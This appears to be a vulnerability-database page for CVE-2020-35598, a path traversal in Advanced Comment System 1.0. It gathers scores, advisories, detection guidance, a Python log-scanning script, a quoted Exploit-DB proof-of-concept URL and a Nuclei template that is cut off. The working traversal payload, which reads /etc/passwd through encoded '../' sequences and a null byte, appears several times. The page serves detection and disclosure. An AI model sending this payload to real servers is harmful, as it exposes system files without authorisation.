CVE-2020-35598
Published 2020-12-23
Priority P2 · 62 · high · 7.5 · CVSS 3.1
AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:N / A:N
EXPLOIT
EPSS: 21.00% (97.3th percentile)
ACS Advanced Comment System 1.0 is affected by Directory Traversal via an advanced_component_system/index.php?ACS_path=..%2f URI. NOTE: this might be the same as CVE-2009-4623
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| advanced_comment_system_project | advanced_comment_system | — | — |
| plohni | advanced_comment_system | — | — |
Detection & IOCs
url: /advanced_component_system/index.php?ACS_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00
- Look for GET requests to /advanced_component_system/index.php with the ACS_path parameter containing URL-encoded path traversal sequences (..%2f) and a null byte (%00) terminator targeting /etc/passwd.
- A successful exploitation response will return HTTP 200 and contain a string matching 'root:.*:0:0:' in the body, indicating /etc/passwd was read.
- The vulnerability is triggered via the ACS_path GET parameter; monitor web logs for any requests to this endpoint containing '%2f' (URL-encoded slash) sequences indicative of directory traversal.
- The exploit uses a null byte (%00) to terminate the path string, which is a technique that may only work on PHP versions where null byte injection in file paths is effective (typically PHP < 5.3.4).
- This CVE may overlap with CVE-2009-4623, suggesting the vulnerability has been known for over a decade and affects the same codebase.
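One way to apply the log-monitoring guidance above, as an added example rather than code from any of the indexed sources: a Python scanner that flags requests to the endpoint whose ACS_path decodes to a `..` path segment or a null byte. The combined log format, the sample lines and all function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Request target and status from a common/combined-format access log line (assumed format).
LOG_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')
ENDPOINT = "/advanced_component_system/index.php"  # path named in the advisory
TRAVERSAL = re.compile(r"(^|[\\/])\.\.([\\/]|$)")  # a ".." path segment

def fully_decode(value, rounds=3):
    """Percent-decode a few times so nested encoding is normalised before matching."""
    for _ in range(rounds):
        value = unquote(value)
    return value

def classify(line):
    """Return None for lines of no interest, else a finding for a suspect request."""
    m = LOG_RE.search(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    if not url.path.lower().endswith(ENDPOINT):
        return None
    reasons = set()
    query = parse_qsl(url.query, keep_blank_values=True)
    for value in (fully_decode(v) for k, v in query if k == "ACS_path"):
        if TRAVERSAL.search(value):
            reasons.add("traversal")
        if "\x00" in value:
            reasons.add("null-byte")
    if not reasons:
        return None
    # HTTP 200 alone does not prove a file was read; it marks the response for body review.
    return {"status": int(m["status"]), "reasons": sorted(reasons),
            "review_body": m["status"] == "200"}

# Constructed sample log lines (documentation IP ranges), not taken from a real server.
SAMPLE = [
    '203.0.113.9 - - [04/Jan/2021:10:00:01 +0000] "GET /advanced_component_system/index.php HTTP/1.1" 200 5120',
    '203.0.113.9 - - [04/Jan/2021:10:00:02 +0000] "GET /search?q=a%2fb HTTP/1.1" 200 310',
    '198.51.100.7 - - [04/Jan/2021:10:00:03 +0000] "GET /advanced_component_system/index.php?ACS_path=..%2f..%2f..%2fetc%2fpasswd%00 HTTP/1.1" 200 1843',
    '198.51.100.7 - - [04/Jan/2021:10:00:04 +0000] "GET /advanced_component_system/index.php?ACS_path=..%2F..%2Fetc%2Fpasswd HTTP/1.1" 404 162',
]

def scan(lines):
    """Return (line_number, finding) pairs for every suspicious request."""
    return [(n, f) for n, line in enumerate(lines, 1) if (f := classify(line))]

if __name__ == "__main__":
    print(scan(SAMPLE))
```

Findings with `review_body` set are the ones to correlate with response bodies or sizes, since the log line alone cannot show whether file content was returned.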
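CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 7.5 | HIGH | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N |
| nvd | v2.0 | 5.0 | MEDIUM | AV:N/AC:L/Au:N/C:P/I:N/A:N |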
GHSA
GHSA-3896-fhmw-qp2v: ACS Advanced Comment System 1
ghsa_unreviewed·2022-05-24
CVE-2020-35598 [HIGH] CWE-22 GHSA-3896-fhmw-qp2v: ACS Advanced Comment System 1
ACS Advanced Comment System 1.0 is affected by Directory Traversal via an advanced_component_system/index.php?ACS_path=..%2f URI.
GHSA
GHSA-6g86-c9gm-gqg5: Multiple PHP remote file inclusion vulnerabilities in Advanced Comment System 1
ghsa_unreviewed·2022-05-02·CVSS 7.5
CVE-2009-4623 [HIGH] CWE-94 GHSA-6g86-c9gm-gqg5: Multiple PHP remote file inclusion vulnerabilities in Advanced Comment System 1
Multiple PHP remote file inclusion vulnerabilities in Advanced Comment System 1.0 allow remote attackers to execute arbitrary PHP code via a URL in the ACS_path parameter to (1) index.php and (2) admin.php in advanced_comment_system/. NOTE: this might only be a vulnerability when the administrator has not followed installation instructions in install.php. NOTE: this might be the same as CVE-2020-35598.
No detection rules found.
Exploit-DB
Advanced Comment System 1.0 - 'ACS_path' Path Traversal
exploitdb·2021-01-04·CVSS 7.5
CVE-2020-35598 [HIGH] Advanced Comment System 1.0 - 'ACS_path' Path Traversal
---
# Exploit Title: Advanced Comment System 1.0 - 'ACS_path' Path Traversal
# Date: Fri, 11 Dec 2020
# Exploit Author: Francisco Javier Santiago Vázquez aka "n0ipr0cs"
# Vendor Homepage: Advanced Comment System - ACS
# Version: v1.0
# CVE: CVE-2020-35598
http://localhost/advanced_component_system/index.php?ACS_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00
Nuclei
Advanced Comment System 1.0 - Local File Inclusion
nuclei·CVSS 7.5
CVE-2020-35598 [HIGH] Advanced Comment System 1.0 - Local File Inclusion
ACS Advanced Comment System 1.0 is affected by local file inclusion via an advanced_component_system/index.php?ACS_path=..%2f URI.
Template:
```yaml
id: CVE-2020-35598

info:
  name: Advanced Comment System 1.0 - Local File Inclusion
  author: daffainfo
  severity: high
  description: ACS Advanced Comment System 1.0 is affected by local file inclusion via an advanced_component_system/index.php?ACS_path=..%2f URI.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire system.
  remediation: |
    Apply the latest patch or update provided by the vendor to fix the local file inclusion vulnerability in the Advanced Comment System 1.0.
  reference:
    - h
```
No writeups or analysis indexed.